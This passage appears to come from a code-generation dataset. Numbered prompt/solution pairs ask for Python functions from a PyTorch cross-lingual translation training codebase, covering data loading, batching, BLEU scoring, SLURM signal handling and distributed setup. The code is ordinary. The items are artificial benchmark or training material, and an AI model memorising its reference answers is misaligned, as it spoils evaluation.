        setattr(params, name + '_config', [(int(k), float(v)) for k, v in pairs])
3,836 | import os
import re
import sys
import pickle
import random
import inspect
import getpass
import argparse
import subprocess
import numpy as np
import torch
from torch import optim
from .logger import create_logger
# Loss-weighting coefficients that may follow an iteration-indexed schedule
# (parsed by parse_lambda_config, refreshed each step by update_lambdas).
DYNAMIC_COEFF = ['lambda_clm', 'lambda_mlm', 'lambda_pc', 'lambda_ae', 'lambda_mt', 'lambda_bt', 'lambda_mass', 'lambda_bmt', 'lambda_span']
def get_lambda_value(config, n_iter):
    """
    Compute a lambda value according to its schedule configuration.

    `config` is a list of (iteration, value) breakpoints with strictly
    increasing iterations. Between two breakpoints the value is linearly
    interpolated; past the last breakpoint the final value is held.
    """
    if n_iter >= config[-1][0]:
        # past the last breakpoint: hold the final value
        return config[-1][1]
    matches = [i for i in range(len(config) - 1) if config[i][0] <= n_iter < config[i + 1][0]]
    assert len(matches) == 1
    seg = matches[0]
    x_a, y_a = config[seg]
    x_b, y_b = config[seg + 1]
    slope = float(y_b - y_a) / float(x_b - x_a)
    return y_a + (n_iter - x_a) * slope
The provided code snippet includes necessary dependencies for implementing the `update_lambdas` function. Write a Python function `def update_lambdas(params, n_iter)` to solve the following problem:
Update all lambda coefficients.
Here is the function:
def update_lambdas(params, n_iter):
    """
    Refresh every scheduled lambda coefficient for the current iteration.

    Coefficients whose `<name>_config` is None are constants and left alone.
    """
    for name in DYNAMIC_COEFF:
        schedule = getattr(params, name + '_config')
        if schedule is None:
            continue
        setattr(params, name, get_lambda_value(schedule, n_iter))
3,837 | import os
import re
import sys
import pickle
import random
import inspect
import getpass
import argparse
import subprocess
import numpy as np
import torch
from torch import optim
from .logger import create_logger
The provided code snippet includes necessary dependencies for implementing the `set_sampling_probs` function. Write a Python function `def set_sampling_probs(data, params)` to solve the following problem:
Set the probability of sampling specific languages / language pairs during training.
Here is the function:
def set_sampling_probs(data, params):
    """
    Set the probability of sampling specific languages / language pairs
    during training.

    Sizes are turned into probabilities, then sharpened/flattened with the
    exponent `params.lg_sampling_factor` and renormalized. A factor of -1
    disables weighted sampling entirely (nothing is set on `params`).
    """
    coeff = params.lg_sampling_factor
    if coeff == -1:
        return
    assert coeff > 0

    def _norm_weights(counts):
        # normalize -> exponentiate by the sampling factor -> renormalize
        w = np.array(counts)
        w = w / w.sum()
        w = w ** coeff
        return w / w.sum()

    # monolingual data: weight languages by training-set size
    params.mono_list = [k for k, v in data['mono_stream'].items() if 'train' in v]
    if len(params.mono_list) > 0:
        sizes = [1.0 * len(data['mono_stream'][lang]['train']) for lang in params.mono_list]
        params.mono_probs = _norm_weights(sizes)

    # parallel data: weight language pairs by training-set size
    params.para_list = [k for k, v in data['para'].items() if 'train' in v]
    if len(params.para_list) > 0:
        sizes = [1.0 * len(data['para'][pair]['train']) for pair in params.para_list]
        params.para_probs = _norm_weights(sizes)
3,838 | import os
import re
import sys
import pickle
import random
import inspect
import getpass
import argparse
import subprocess
import numpy as np
import torch
from torch import optim
from .logger import create_logger
The provided code snippet includes necessary dependencies for implementing the `concat_batches` function. Write a Python function `def concat_batches(x1, len1, lang1_id, x2, len2, lang2_id, pad_idx, eos_idx, reset_positions)` to solve the following problem:
Concat batches with different languages.
Here is the function:
def concat_batches(x1, len1, lang1_id, x2, len2, lang2_id, pad_idx, eos_idx, reset_positions):
    """
    Concatenate two batches of sentences in (possibly) different languages.

    When `reset_positions` is False, the trailing </s> of the first sentence
    and the leading </s> of the second are merged into a single token and
    positions run continuously; when True, both </s> are kept and positions
    restart at 0 for the second sentence.

    Returns (x, lengths, positions, langs), all shaped (slen, bs) except
    `lengths` which is (bs,).
    """
    assert reset_positions is False or lang1_id != lang2_id
    lengths = len1 + len2
    if not reset_positions:
        # the two boundary </s> tokens are merged into one
        lengths -= 1
    slen = lengths.max().item()
    bs = lengths.size(0)

    x = x1.new(slen, bs).fill_(pad_idx)
    x[:len1.max().item()].copy_(x1)
    positions = torch.arange(slen)[:, None].repeat(1, bs).to(x1.device)
    langs = x1.new(slen, bs).fill_(lang1_id)

    for i in range(bs):
        # where the second sentence starts (overwriting x1's </s> if merging)
        offset = len1[i] if reset_positions else len1[i] - 1
        x[offset:offset + len2[i], i].copy_(x2[:len2[i], i])
        if reset_positions:
            positions[offset:, i] -= len1[i]
        langs[offset:, i] = lang2_id

    # each sentence carries 3 </s> when merged, 4 when positions are reset
    assert (x == eos_idx).long().sum().item() == (4 if reset_positions else 3) * bs
    return x, lengths, positions, langs
3,839 | import os
import re
import sys
import pickle
import random
import inspect
import getpass
import argparse
import subprocess
import numpy as np
import torch
from torch import optim
from .logger import create_logger
The provided code snippet includes necessary dependencies for implementing the `truncate` function. Write a Python function `def truncate(x, lengths, max_len, eos_index)` to solve the following problem:
Truncate long sentences.
Here is the function:
def truncate(x, lengths, max_len, eos_index):
    """
    Clip sentences longer than `max_len`, rewriting the EOS token.

    If nothing exceeds `max_len`, the inputs are returned unchanged (same
    objects); otherwise clones are returned with the last kept token of
    every clipped sentence set to `eos_index`.
    """
    if lengths.max().item() <= max_len:
        # nothing to clip
        return x, lengths
    x = x[:max_len].clone()
    lengths = lengths.clone()
    for i in range(len(lengths)):
        if lengths[i] > max_len:
            lengths[i] = max_len
            x[max_len - 1, i] = eos_index
    return x, lengths
3,840 | import os
import re
import sys
import pickle
import random
import inspect
import getpass
import argparse
import subprocess
import numpy as np
import torch
from torch import optim
from .logger import create_logger
The provided code snippet includes necessary dependencies for implementing the `shuf_order` function. Write a Python function `def shuf_order(langs, params=None, n=5)` to solve the following problem:
Randomize training order.
Here is the function:
def shuf_order(langs, params=None, n=5):
    """
    Randomize training order over languages / language pairs.

    Without `params`, returns a plain permutation of `langs`. With `params`,
    monolingual entries (l2 is None) and parallel pairs are sampled
    separately — uniformly, or weighted by the precomputed mono/para
    probabilities when `params.lg_sampling_factor` != -1 — drawing up to `n`
    of each (with replacement).
    """
    if len(langs) == 0:
        return []
    if params is None:
        order = np.random.permutation(len(langs))
        return [langs[i] for i in order]

    # split monolingual entries from parallel pairs
    mono = [l1 for l1, l2 in langs if l2 is None]
    para = [(l1, l2) for l1, l2 in langs if l2 is not None]

    # uniform / weighted sampling distributions
    if params.lg_sampling_factor == -1:
        p_mono = None
        p_para = None
    else:
        p_mono = np.array([params.mono_probs[params.mono_list.index(k)] for k in mono])
        p_para = np.array([params.para_probs[params.para_list.index(tuple(sorted(k)))] for k in para])
        p_mono = p_mono / p_mono.sum()
        p_para = p_para / p_para.sum()

    s_mono = []
    if len(mono) > 0:
        picks = np.random.choice(len(mono), size=min(n, len(mono)), p=p_mono, replace=True)
        s_mono = [mono[i] for i in picks]
    s_para = []
    if len(para) > 0:
        picks = np.random.choice(len(para), size=min(n, len(para)), p=p_para, replace=True)
        s_para = [para[i] for i in picks]
    assert len(s_mono) + len(s_para) > 0
    return [(lang, None) for lang in s_mono] + s_para
3,841 | from logging import getLogger
import os
import numpy as np
import torch
from .dataset import Dataset, StreamDataset, ParallelDataset
from .dictionary import BOS_WORD, EOS_WORD, PAD_WORD, UNK_WORD, MASK_WORD
The provided code snippet includes necessary dependencies for implementing the `check_data_params` function. Write a Python function `def check_data_params(params)` to solve the following problem:
Check datasets parameters.
Here is the function:
def check_data_params(params):
    """
    Check datasets parameters.

    Validates and normalizes every dataset-related field on `params` in place:
    parses the language list and the training-step descriptors (CLM, MLM/TLM,
    PC, MT, BMT, AE, MASS, BT), then resolves and existence-checks the dataset
    file paths those steps require. Raises AssertionError on any inconsistency.
    """
    # data path
    assert os.path.isdir(params.data_path), params.data_path
    # check languages ("debug" is a shorthand for English-only)
    params.langs = params.lgs.split('-') if params.lgs != 'debug' else ['en']
    assert len(params.langs) == len(set(params.langs)) >= 1
    # assert sorted(params.langs) == params.langs
    params.id2lang = {k: v for k, v in enumerate(sorted(params.langs))}
    params.lang2id = {k: v for v, k in params.id2lang.items()}
    params.n_langs = len(params.langs)
    # CLM steps: "en" (monolingual) becomes ('en', None); "en-fr" a pair tuple
    clm_steps = [s.split('-') for s in params.clm_steps.split(',') if len(s) > 0]
    params.clm_steps = [(s[0], None) if len(s) == 1 else tuple(s) for s in clm_steps]
    assert all([(l1 in params.langs) and (l2 in params.langs or l2 is None) for l1, l2 in params.clm_steps])
    assert len(params.clm_steps) == len(set(params.clm_steps))
    # MLM / TLM steps: same "lg" / "lg1-lg2" format as CLM
    mlm_steps = [s.split('-') for s in params.mlm_steps.split(',') if len(s) > 0]
    params.mlm_steps = [(s[0], None) if len(s) == 1 else tuple(s) for s in mlm_steps]
    assert all([(l1 in params.langs) and (l2 in params.langs or l2 is None) for l1, l2 in params.mlm_steps])
    assert len(params.mlm_steps) == len(set(params.mlm_steps))
    # parallel classification steps: always pairs of distinct languages
    params.pc_steps = [tuple(s.split('-')) for s in params.pc_steps.split(',') if len(s) > 0]
    assert all([len(x) == 2 for x in params.pc_steps])
    assert all([l1 in params.langs and l2 in params.langs for l1, l2 in params.pc_steps])
    assert all([l1 != l2 for l1, l2 in params.pc_steps])
    assert len(params.pc_steps) == len(set(params.pc_steps))
    # machine translation steps: pairs of distinct languages, need a decoder
    params.mt_steps = [tuple(s.split('-')) for s in params.mt_steps.split(',') if len(s) > 0]
    assert all([len(x) == 2 for x in params.mt_steps])
    assert all([l1 in params.langs and l2 in params.langs for l1, l2 in params.mt_steps])
    assert all([l1 != l2 for l1, l2 in params.mt_steps])
    assert len(params.mt_steps) == len(set(params.mt_steps))
    assert len(params.mt_steps) == 0 or not params.encoder_only
    # back machine translation steps
    # NOTE(review): unlike every other step list, bmt_steps is not validated
    # against params.langs — confirm this is intentional
    params.bmt_steps = [tuple(s.split('-')) for s in params.bmt_steps.split(',') if len(s) > 0]
    # denoising auto-encoder steps: single languages, need a decoder
    params.ae_steps = [s for s in params.ae_steps.split(',') if len(s) > 0]
    assert all([lang in params.langs for lang in params.ae_steps])
    assert len(params.ae_steps) == len(set(params.ae_steps))
    assert len(params.ae_steps) == 0 or not params.encoder_only
    # mass steps: every ordered pair of distinct MASS languages
    params.mass_steps = [s for s in params.mass_steps.split(',') if len(s) > 0]
    mass_steps = []
    for src in params.mass_steps:
        for tgt in params.mass_steps:
            if src != tgt:
                mass_steps.append(tuple([src, tgt]))
    # back-translation steps: "l1-l2-l3" round trips with l1 == l3, l1 != l2
    params.bt_steps = [tuple(s.split('-')) for s in params.bt_steps.split(',') if len(s) > 0]
    assert all([len(x) == 3 for x in params.bt_steps])
    assert all([l1 in params.langs and l2 in params.langs and l3 in params.langs for l1, l2, l3 in params.bt_steps])
    assert all([l1 == l3 and l1 != l2 for l1, l2, l3 in params.bt_steps])
    assert len(params.bt_steps) == len(set(params.bt_steps))
    assert len(params.bt_steps) == 0 or not params.encoder_only
    params.bt_src_langs = [l1 for l1, _, _ in params.bt_steps]
    # check monolingual datasets: every language used by a monolingual
    # objective needs <split>.<lang>.pth for train/valid/test
    required_mono = set([l1 for l1, l2 in (params.mlm_steps + params.clm_steps) if l2 is None] + params.ae_steps + params.bt_src_langs + params.mass_steps)
    params.mono_dataset = {
        lang: {
            splt: os.path.join(params.data_path, '%s.%s.pth' % (splt, lang))
            for splt in ['train', 'valid', 'test']
        } for lang in params.langs if lang in required_mono
    }
    assert all([all([os.path.isfile(p) for p in paths.values()]) for paths in params.mono_dataset.values()])
    # check parallel datasets: training files are only required for pairs some
    # training step consumes; valid/test files are required for all used pairs
    required_para_train = set(params.clm_steps + params.mlm_steps + params.pc_steps + params.mt_steps)
    required_para = required_para_train | set([(l2, l3) for _, l2, l3 in params.bt_steps] + mass_steps)
    params.para_dataset = {
        (src, tgt): {
            splt: (os.path.join(params.data_path, '%s.%s-%s.%s.pth' % (splt, src, tgt, src)),
                   os.path.join(params.data_path, '%s.%s-%s.%s.pth' % (splt, src, tgt, tgt)))
            for splt in ['train', 'valid', 'test']
            if splt != 'train' or (src, tgt) in required_para_train or (tgt, src) in required_para_train
        } for src in params.langs for tgt in params.langs
        if src < tgt and ((src, tgt) in required_para or (tgt, src) in required_para)
    }
    assert all([all([os.path.isfile(p1) and os.path.isfile(p2) for p1, p2 in paths.values()]) for paths in params.para_dataset.values()])
    # back parallel datasets (for the bmt steps); note: existence not checked here
    params.back_dataset = {
        (src, tgt): (
            os.path.join(params.data_path, '%s-%s.%s.pth' % (src, tgt, src)),
            os.path.join(params.data_path, '%s-%s.%s.pth' % (src, tgt, tgt))
        ) for (src, tgt) in params.bmt_steps
    }
    # check that we can evaluate on BLEU (requires a generation step)
    assert params.eval_bleu is False or len(params.mt_steps + params.bt_steps + mass_steps) > 0
3,842 | from logging import getLogger
import os
import numpy as np
import torch
from .dataset import Dataset, StreamDataset, ParallelDataset
from .dictionary import BOS_WORD, EOS_WORD, PAD_WORD, UNK_WORD, MASK_WORD
# Shared module-level logger; its handlers are configured by create_logger.
logger = getLogger()
def load_mono_data(params, data):
    """
    Load monolingual data.

    Populates, in place:
      - data['mono_stream'][lang][split]: a StreamDataset for every language
        in params.mono_dataset
      - data['mono'][lang][split]: a batched Dataset, only for languages used
        by AE / BT / MASS steps (those objectives need sentence boundaries)
    """
    data['mono'] = {}
    data['mono_stream'] = {}
    for lang in params.mono_dataset.keys():
        logger.info('============ Monolingual data (%s)' % lang)
        assert lang in params.langs and lang not in data['mono']
        data['mono'][lang] = {}
        data['mono_stream'][lang] = {}
        for splt in ['train', 'valid', 'test']:
            # no need to load training data for evaluation
            if splt == 'train' and params.eval_only:
                continue
            # load data / update dictionary parameters / update data
            mono_data = load_binarized(params.mono_dataset[lang][splt], params)
            set_dico_parameters(params, data, mono_data['dico'])
            # create stream dataset
            data['mono_stream'][lang][splt] = StreamDataset(mono_data['sentences'], mono_data['positions'], params)
            # if there are several processes on the same machine, we can split the
            # dataset: each local rank keeps a contiguous slice of the batches
            if splt == 'train' and params.split_data and 1 < params.n_gpu_per_node <= data['mono_stream'][lang][splt].n_batches:
                n_batches = data['mono_stream'][lang][splt].n_batches // params.n_gpu_per_node
                a = n_batches * params.local_rank
                b = n_batches * params.local_rank + n_batches
                data['mono_stream'][lang][splt].select_data(a, b)
            # for denoising auto-encoding and online back-translation, we need a
            # non-stream (batched) dataset
            if lang in params.ae_steps or lang in params.bt_src_langs or lang in params.mass_steps:
                # create batched dataset
                dataset = Dataset(mono_data['sentences'], mono_data['positions'], params)
                # remove empty and too long sentences (training split only)
                if splt == 'train':
                    dataset.remove_empty_sentences()
                    dataset.remove_long_sentences(params.max_len)
                    dataset.remove_short_sentences(params.min_len)
                # if there are several processes on the same machine, we can split
                # the dataset: each local rank keeps a contiguous slice of sentences
                if splt == 'train' and params.n_gpu_per_node > 1 and params.split_data:
                    n_sent = len(dataset) // params.n_gpu_per_node
                    a = n_sent * params.local_rank
                    b = n_sent * params.local_rank + n_sent
                    dataset.select_data(a, b)
                data['mono'][lang][splt] = dataset
        logger.info("")
    logger.info("")
def load_para_data(params, data):
    """
    Load parallel data.

    Populates data['para'][(src, tgt)][split] with a ParallelDataset for every
    pair in params.para_dataset. Training data is only loaded for pairs that
    a training step actually consumes; for back-translation-only pairs just
    valid/test are read.
    """
    data['para'] = {}
    required_para_train = set(params.clm_steps + params.mlm_steps + params.pc_steps + params.mt_steps)
    for src, tgt in params.para_dataset.keys():
        logger.info('============ Parallel data (%s-%s)' % (src, tgt))
        assert (src, tgt) not in data['para']
        data['para'][(src, tgt)] = {}
        for splt in ['train', 'valid', 'test']:
            # no need to load training data for evaluation
            if splt == 'train' and params.eval_only:
                continue
            # for back-translation, we can't load training data
            if splt == 'train' and (src, tgt) not in required_para_train and (tgt, src) not in required_para_train:
                continue
            # load binarized datasets (one file per side of the pair)
            src_path, tgt_path = params.para_dataset[(src, tgt)][splt]
            src_data = load_binarized(src_path, params)
            tgt_data = load_binarized(tgt_path, params)
            # update dictionary parameters (both sides must share the dictionary)
            set_dico_parameters(params, data, src_data['dico'])
            set_dico_parameters(params, data, tgt_data['dico'])
            # create ParallelDataset
            dataset = ParallelDataset(
                src_data['sentences'], src_data['positions'],
                tgt_data['sentences'], tgt_data['positions'],
                params,
            )
            # remove empty and too long sentences (training split only)
            if splt == 'train':
                dataset.remove_empty_sentences()
                dataset.remove_long_sentences(params.max_len)
            # for validation and test set, enumerate sentence per sentence
            if splt != 'train':
                dataset.tokens_per_batch = -1
            # if there are several processes on the same machine, we can split the
            # dataset: each local rank keeps a contiguous slice of sentences
            if splt == 'train' and params.n_gpu_per_node > 1 and params.split_data:
                n_sent = len(dataset) // params.n_gpu_per_node
                a = n_sent * params.local_rank
                b = n_sent * params.local_rank + n_sent
                dataset.select_data(a, b)
            data['para'][(src, tgt)][splt] = dataset
        logger.info("")
    logger.info("")
def load_back_data(params, data):
    """
    Load back-translation parallel data.

    Populates data['back'][(src, tgt)] with one ParallelDataset per pair
    in params.back_dataset (no train/valid/test split). Mutates `data`
    in place.
    """
    data['back'] = {}
    # NOTE(review): computed but never used below — presumably intended to
    # filter params.back_dataset by the bmt training steps; confirm upstream.
    required_back_train = set(params.bmt_steps)
    for src, tgt in params.back_dataset.keys():
        logger.info('============ Back Parallel data (%s-%s)' % (src, tgt))
        assert (src, tgt) not in data['back']
        # placeholder; overwritten with the dataset object below
        data['back'][(src, tgt)] = {}
        # load binarized datasets
        src_path, tgt_path = params.back_dataset[(src, tgt)]
        src_data = load_binarized(src_path, params)
        tgt_data = load_binarized(tgt_path, params)
        # update dictionary parameters
        set_dico_parameters(params, data, src_data['dico'])
        set_dico_parameters(params, data, tgt_data['dico'])
        dataset = ParallelDataset(
            src_data['sentences'], src_data['positions'],
            tgt_data['sentences'], tgt_data['positions'],
            params,
        )
        dataset.remove_empty_sentences()
        dataset.remove_long_sentences(params.max_len)
        # if there are several processes on the same machine, split the dataset
        if params.n_gpu_per_node > 1 and params.split_data:
            n_sent = len(dataset) // params.n_gpu_per_node
            a = n_sent * params.local_rank
            b = n_sent * params.local_rank + n_sent
            dataset.select_data(a, b)
        data['back'][(src, tgt)] = dataset
        logger.info("")
    logger.info("")
The provided code snippet includes necessary dependencies for implementing the `load_data` function. Write a Python function `def load_data(params)` to solve the following problem:
Load monolingual data. The returned dictionary contains: - dico (dictionary) - vocab (FloatTensor) - train / valid / test (monolingual datasets)
Here is the function:
def load_data(params):
    """
    Load monolingual data.
    The returned dictionary contains:
        - dico (dictionary)
        - vocab (FloatTensor)
        - train / valid / test (monolingual datasets)

    The dictionary is filled by the load_*_data helpers, which add
    'mono'/'mono_stream', 'para' and 'back' entries; a summary of the
    loaded dataset sizes is logged before returning.
    """
    data = {}
    # monolingual datasets
    load_mono_data(params, data)
    # parallel datasets
    load_para_data(params, data)
    # back translation datasets
    load_back_data(params, data)
    # monolingual data summary
    logger.info('============ Data summary')
    for lang, v in data['mono_stream'].items():
        for data_set in v.keys():
            logger.info('{: <18} - {: >5} - {: >12}:{: >10}'.format('Monolingual data', data_set, lang, len(v[data_set])))
    # parallel data summary
    for (src, tgt), v in data['para'].items():
        for data_set in v.keys():
            logger.info('{: <18} - {: >5} - {: >12}:{: >10}'.format('Parallel data', data_set, '%s-%s' % (src, tgt), len(v[data_set])))
    logger.info("")
    return data
3,843 | from logging import getLogger
import os
import subprocess
from collections import OrderedDict
import numpy as np
import torch
from ..utils import to_cuda, restore_segmentation, concat_batches
The provided code snippet includes necessary dependencies for implementing the `convert_to_text` function. Write a Python function `def convert_to_text(batch, lengths, dico, params)` to solve the following problem:
Convert a batch of sentences to a list of text sentences.
Here is the function:
def convert_to_text(batch, lengths, dico, params):
    """
    Convert a batch of sentences to a list of text sentences.

    `batch` is a (slen, bs) LongTensor of word indices, `lengths` a (bs,)
    LongTensor; every column is expected to be <EOS> w1 ... wn <EOS> padded.
    Words are looked up in `dico` and joined with single spaces.
    """
    batch = batch.cpu().numpy()
    lengths = lengths.cpu().numpy()
    slen, bs = batch.shape
    # sanity checks: sizes agree, every sentence starts with EOS and
    # contains exactly one more EOS (its terminator)
    assert lengths.max() == slen and lengths.shape[0] == bs
    assert (batch[0] == params.eos_index).sum() == bs
    assert (batch == params.eos_index).sum() == 2 * bs
    sentences = []
    for col in range(bs):
        words = []
        for row in range(1, lengths[col]):
            token = batch[row, col]
            if token == params.eos_index:
                break
            words.append(dico[token])
        sentences.append(" ".join(words))
    return sentences
3,844 | from logging import getLogger
import os
import subprocess
from collections import OrderedDict
import numpy as np
import torch
from ..utils import to_cuda, restore_segmentation, concat_batches
BLEU_SCRIPT_PATH = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'multi-bleu.perl')
assert os.path.isfile(BLEU_SCRIPT_PATH)
logger = getLogger()
The provided code snippet includes necessary dependencies for implementing the `eval_moses_bleu` function. Write a Python function `def eval_moses_bleu(ref, hyp)` to solve the following problem:
Given hypothesis and reference files, evaluate the BLEU score using Moses scripts.
Here is the function:
def eval_moses_bleu(ref, hyp):
    """
    Given hypothesis and reference files, evaluate the BLEU score
    using the Moses `multi-bleu.perl` script.

    `ref` may be a single file or a prefix for multi-reference files
    (`ref0`, `ref1`, ...). Returns the BLEU score as a float, or -1 when
    the script output cannot be parsed.
    """
    assert os.path.isfile(hyp)
    assert os.path.isfile(ref) or os.path.isfile(ref + '0')
    assert os.path.isfile(BLEU_SCRIPT_PATH)
    # NOTE(review): paths are interpolated into a shell command (shell=True
    # is needed for the '<' redirection) — only safe for trusted,
    # shell-safe file names.
    command = BLEU_SCRIPT_PATH + ' %s < %s'
    p = subprocess.Popen(command % (ref, hyp), stdout=subprocess.PIPE, shell=True)
    result = p.communicate()[0].decode("utf-8")
    # expected output looks like: "BLEU = 33.12, ..."
    if result.startswith('BLEU'):
        return float(result[7:result.index(',')])
    else:
        logger.warning('Impossible to parse BLEU score! "%s"' % result)
        return -1
3,845 | from logging import getLogger
import os
import sys
import torch
import socket
import signal
import subprocess
logger = getLogger()
def sig_handler(signum, frame):
    """
    SIGUSR1 handler for SLURM time-limit warnings.

    The master process (SLURM_PROCID == 0) requeues the current job via
    `scontrol requeue`; every process then exits with status -1.
    """
    logger.warning("Signal handler called with signal " + str(signum))
    prod_id = int(os.environ['SLURM_PROCID'])
    logger.warning("Host: %s - Global rank: %i" % (socket.gethostname(), prod_id))
    if prod_id == 0:
        logger.warning("Requeuing job " + os.environ['SLURM_JOB_ID'])
        os.system('scontrol requeue ' + os.environ['SLURM_JOB_ID'])
    else:
        logger.warning("Not the master process, no need to requeue.")
    sys.exit(-1)
def term_handler(signum, frame):
    """
    SIGTERM handler: log the signal and deliberately ignore it, so a SLURM
    pre-emption does not kill the job before the SIGUSR1 requeue handler
    has had a chance to run.
    """
    # lazy %-style logging args: formatting is skipped if the level is disabled
    logger.warning("Signal handler called with signal %s", signum)
    logger.warning("Bypassing SIGTERM.")
The provided code snippet includes necessary dependencies for implementing the `init_signal_handler` function. Write a Python function `def init_signal_handler()` to solve the following problem:
Handle signals sent by SLURM for time limit / pre-emption.
Here is the function:
def init_signal_handler():
    """
    Handle signals sent by SLURM for time limit / pre-emption.

    SIGUSR1 triggers a job requeue (see `sig_handler`); SIGTERM is logged
    and bypassed (see `term_handler`).
    """
    signal.signal(signal.SIGUSR1, sig_handler)
    signal.signal(signal.SIGTERM, term_handler)
    logger.warning("Signal handler installed.")
3,846 | from logging import getLogger
import os
import sys
import torch
import socket
import signal
import subprocess
The provided code snippet includes necessary dependencies for implementing the `init_distributed_mode` function. Write a Python function `def init_distributed_mode(params)` to solve the following problem:
Handle single and multi-GPU / multi-node / SLURM jobs. Initialize the following variables: - n_nodes - node_id - local_rank - global_rank - world_size
Here is the function:
def init_distributed_mode(params):
    """
    Handle single and multi-GPU / multi-node / SLURM jobs.
    Initialize the following variables:
        - n_nodes
        - node_id
        - local_rank
        - global_rank
        - world_size

    Also derives is_master / multi_node / multi_gpu, binds the process to
    its GPU, and initializes the NCCL process group when multi_gpu.
    """
    params.is_slurm_job = 'SLURM_JOB_ID' in os.environ and not params.debug_slurm
    print("SLURM job: %s" % str(params.is_slurm_job))

    # SLURM job: everything is read from the SLURM environment
    if params.is_slurm_job:
        assert params.local_rank == -1   # on the cluster, this is handled by SLURM
        SLURM_VARIABLES = [
            'SLURM_JOB_ID',
            'SLURM_JOB_NODELIST', 'SLURM_JOB_NUM_NODES', 'SLURM_NTASKS', 'SLURM_TASKS_PER_NODE',
            'SLURM_MEM_PER_NODE', 'SLURM_MEM_PER_CPU',
            'SLURM_NODEID', 'SLURM_PROCID', 'SLURM_LOCALID', 'SLURM_TASK_PID'
        ]
        PREFIX = "%i - " % int(os.environ['SLURM_PROCID'])
        for name in SLURM_VARIABLES:
            value = os.environ.get(name, None)
            print(PREFIX + "%s: %s" % (name, str(value)))
        # # job ID
        # params.job_id = os.environ['SLURM_JOB_ID']
        # number of nodes / node ID
        params.n_nodes = int(os.environ['SLURM_JOB_NUM_NODES'])
        params.node_id = int(os.environ['SLURM_NODEID'])
        # local rank on the current node / global rank
        params.local_rank = int(os.environ['SLURM_LOCALID'])
        params.global_rank = int(os.environ['SLURM_PROCID'])
        # number of processes / GPUs per node
        params.world_size = int(os.environ['SLURM_NTASKS'])
        params.n_gpu_per_node = params.world_size // params.n_nodes
        # define master address and master port (first host in the node list)
        hostnames = subprocess.check_output(['scontrol', 'show', 'hostnames', os.environ['SLURM_JOB_NODELIST']])
        params.master_addr = hostnames.split()[0].decode('utf-8')
        assert 10001 <= params.master_port <= 20000 or params.world_size == 1
        print(PREFIX + "Master address: %s" % params.master_addr)
        print(PREFIX + "Master port : %i" % params.master_port)
        # set environment variables for 'env://'
        os.environ['MASTER_ADDR'] = params.master_addr
        os.environ['MASTER_PORT'] = str(params.master_port)
        os.environ['WORLD_SIZE'] = str(params.world_size)
        os.environ['RANK'] = str(params.global_rank)

    # multi-GPU job (local or multi-node) - jobs started with torch.distributed.launch
    elif params.local_rank != -1:
        assert params.master_port == -1
        # read environment variables (NGPU is expected to be set by the launcher)
        params.global_rank = int(os.environ['RANK'])
        params.world_size = int(os.environ['WORLD_SIZE'])
        params.n_gpu_per_node = int(os.environ['NGPU'])
        # number of nodes / node ID
        params.n_nodes = params.world_size // params.n_gpu_per_node
        params.node_id = params.global_rank // params.n_gpu_per_node

    # local job (single GPU)
    else:
        assert params.local_rank == -1
        assert params.master_port == -1
        params.n_nodes = 1
        params.node_id = 0
        params.local_rank = 0
        params.global_rank = 0
        params.world_size = 1
        params.n_gpu_per_node = 1

    # sanity checks
    assert params.n_nodes >= 1
    assert 0 <= params.node_id < params.n_nodes
    assert 0 <= params.local_rank <= params.global_rank < params.world_size
    assert params.world_size == params.n_nodes * params.n_gpu_per_node

    # define whether this is the master process / if we are in distributed mode
    params.is_master = params.node_id == 0 and params.local_rank == 0
    params.multi_node = params.n_nodes > 1
    params.multi_gpu = params.world_size > 1

    # summary
    PREFIX = "%i - " % params.global_rank
    print(PREFIX + "Number of nodes: %i" % params.n_nodes)
    print(PREFIX + "Node ID : %i" % params.node_id)
    print(PREFIX + "Local rank : %i" % params.local_rank)
    print(PREFIX + "Global rank : %i" % params.global_rank)
    print(PREFIX + "World size : %i" % params.world_size)
    print(PREFIX + "GPUs per node : %i" % params.n_gpu_per_node)
    print(PREFIX + "Master : %s" % str(params.is_master))
    print(PREFIX + "Multi-node : %s" % str(params.multi_node))
    print(PREFIX + "Multi-GPU : %s" % str(params.multi_gpu))
    print(PREFIX + "Hostname : %s" % socket.gethostname())

    # set GPU device (one process per GPU)
    torch.cuda.set_device(params.local_rank)

    # initialize multi-GPU
    if params.multi_gpu:
        # http://pytorch.apachecn.org/en/0.3.0/distributed.html#environment-variable-initialization
        # 'env://' will read these environment variables:
        # MASTER_PORT - required; has to be a free port on machine with rank 0
        # MASTER_ADDR - required (except for rank 0); address of rank 0 node
        # WORLD_SIZE - required; can be set either here, or in a call to init function
        # RANK - required; can be set either here, or in a call to init function
        print("Initializing PyTorch distributed ...")
        torch.distributed.init_process_group(
            init_method='env://',
            backend='nccl',
        )
3,847 | from logging import getLogger
import math
import itertools
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
def Embedding(num_embeddings, embedding_dim, padding_idx=None):
    """Create an nn.Embedding initialised with N(0, dim**-0.5); the padding
    row (if any) is zeroed."""
    emb = nn.Embedding(num_embeddings, embedding_dim, padding_idx=padding_idx)
    nn.init.normal_(emb.weight, mean=0, std=embedding_dim ** -0.5)
    if padding_idx is not None:
        nn.init.constant_(emb.weight[padding_idx], 0)
    return emb
3,848 | from logging import getLogger
import math
import itertools
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
def Linear(in_features, out_features, bias=True):
    """Return a plain nn.Linear layer with PyTorch's default initialisation."""
    return nn.Linear(in_features, out_features, bias)
3,849 | from logging import getLogger
import math
import itertools
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
def create_sinusoidal_embeddings(n_pos, dim, out):
    """
    Fill `out` (an (n_pos, dim) tensor) in place with fixed sinusoidal
    position encodings — sin on even feature indices, cos on odd ones —
    and mark the tensor as non-trainable.
    """
    positions = np.arange(n_pos)[:, None]
    features = np.arange(dim)[None, :]
    # same per-element formula as the original list comprehension:
    # pos / 10000 ** (2 * (j // 2) / dim)
    angles = positions / np.power(10000, 2 * (features // 2) / dim)
    out[:, 0::2] = torch.FloatTensor(np.sin(angles[:, 0::2]))
    out[:, 1::2] = torch.FloatTensor(np.cos(angles[:, 1::2]))
    out.detach_()
    out.requires_grad = False
3,850 | from logging import getLogger
import math
import itertools
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
The provided code snippet includes necessary dependencies for implementing the `gelu` function. Write a Python function `def gelu(x)` to solve the following problem:
